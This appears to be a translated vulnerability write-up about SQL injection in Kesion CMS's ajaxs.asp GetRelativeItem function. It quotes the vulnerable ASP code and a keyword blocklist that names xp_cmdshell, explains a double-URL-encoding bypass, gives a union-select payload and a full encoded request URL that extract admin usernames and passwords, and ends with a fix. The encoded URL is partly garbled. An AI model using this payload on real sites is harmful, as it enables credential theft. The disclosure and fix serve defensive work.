Kesion cms Injection Vulnerability

Source: Internet
Author: User

Injection caused by inconsistent ordering of the input filtering functions

Dim KS: Set KS = New PublicCls
Dim Action
Action = KS.S("Action")
Select Case Action
    Case "Ctoe": CtoE
    Case "GetTags": GetTags
    Case "GetRelativeItem": GetRelativeItem   ' problem function
    ' ... other cases omitted ...
    Case "getonlinelist": getonlinelist
End Select

Sub GetRelativeItem()   ' vulnerable function starts here
    ' Vulnerability location: only KS.S is applied to the raw value, and the result is
    ' then decoded with UnEscape; nothing filters the decoded value.
    Dim Key: Key = UnEscape(KS.S("Key"))
    Dim Rtitle: Rtitle = LCase(KS.G("rtitle"))
    Dim RKey: RKey = LCase(KS.G("Rkey"))
    Dim ChannelID: ChannelID = KS.ChkClng(KS.S("Channelid"))
    Dim ID: ID = KS.ChkClng(KS.G("ID"))
    Dim Param, RS, SQL, k, SqlStr
    If Key <> "" Then
        If (Rtitle = "true" Or RKey = "true") Then
            If Rtitle = "true" Then
                Param = Param & "title like '%" & Key & "%'"   ' search-style injection point
            End If
            If RKey = "true" Then
                If Param = "" Then
                    Param = Param & "keywords like '%" & Key & "%'"
                Else
                    Param = Param & " or keywords like '%" & Key & "%'"
                End If
            End If
        Else
            Param = Param & "keywords like '%" & Key & "%'"
        End If
    End If

    If Param <> "" Then
        Param = " where InfoID <> " & ID & " and (" & Param & ")"
    Else
        Param = " where InfoID <> " & ID
    End If

    If ChannelID <> 0 Then Param = Param & " and ChannelID = " & ChannelID

    Param = Param & " and verific = 1"

    ' The concatenated query is executed as-is.
    SqlStr = "Select top 30 ChannelID, InfoID, Title From KS_ItemInfo" & Param & " order by id desc"
    Set RS = Server.CreateObject("ADODB.RECORDSET")
    RS.Open SqlStr, conn, 1, 1
    If Not RS.Eof Then
        SQL = RS.GetRows(-1)
    End If
    RS.Close
    ' ... remainder of the Sub omitted ...
End Sub

KS.S filters the raw request value first; UnEscape is only called afterwards, on the already-filtered result:

Public Function S(Str)
    ' Strip both quote characters from the request value, then run the keyword check.
    S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
End Function

Function DelSql(Str)
    Dim SplitSqlStr, SplitSqlArr, I
    SplitSqlStr = "dbcc|alter|drop|*|and|exec|or|insert|select|delete|update|count|master|truncate|declare|char|mid|chr|set|where|xp_cmdshell"
    SplitSqlArr = Split(SplitSqlStr, "|")
    For I = LBound(SplitSqlArr) To UBound(SplitSqlArr)
        ' Case-insensitive substring match; any hit aborts the request.
        If InStr(LCase(Str), SplitSqlArr(I)) > 0 Then
            Die "<script>alert('System warning!\n\n1. The data you submitted contains malicious characters: " & SplitSqlArr(I) & ";\n2. Your data has been recorded;\n3. Your IP address: " & GetIP & ";\n4. Operation date: " & Now & ";\nPowered By Kesion.com!');window.close();</script>"
        End If
    Next
    DelSql = Str
End Function

Because UnEscape() runs after the filter, the filter has no effect on encoded input: a character can be sent URL-encoded twice, so that KS.S (which inspects the once-decoded request value) never sees it. For example, a single quote sent as %2527 reaches KS.S as the literal text %27, passes both the quote stripping and the DelSql keyword check, and only becomes ' when UnEscape() decodes it. This is a double-encoding bypass of the same kind seen in PHP applications.


Injection statement: % ') union select 1, 2, username +' | '+ password from KS_Admin
 
The conversion is as follows:
/Plus/ajaxs. asp? Action = GetRelativeItem & key = search % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500
Solution:

Move the UnEscape() call so that decoding happens before filtering (that is, inside the KS.S function body, ahead of the quote stripping and the DelSql check), or do not call UnEscape() at all.

Author ywledoc
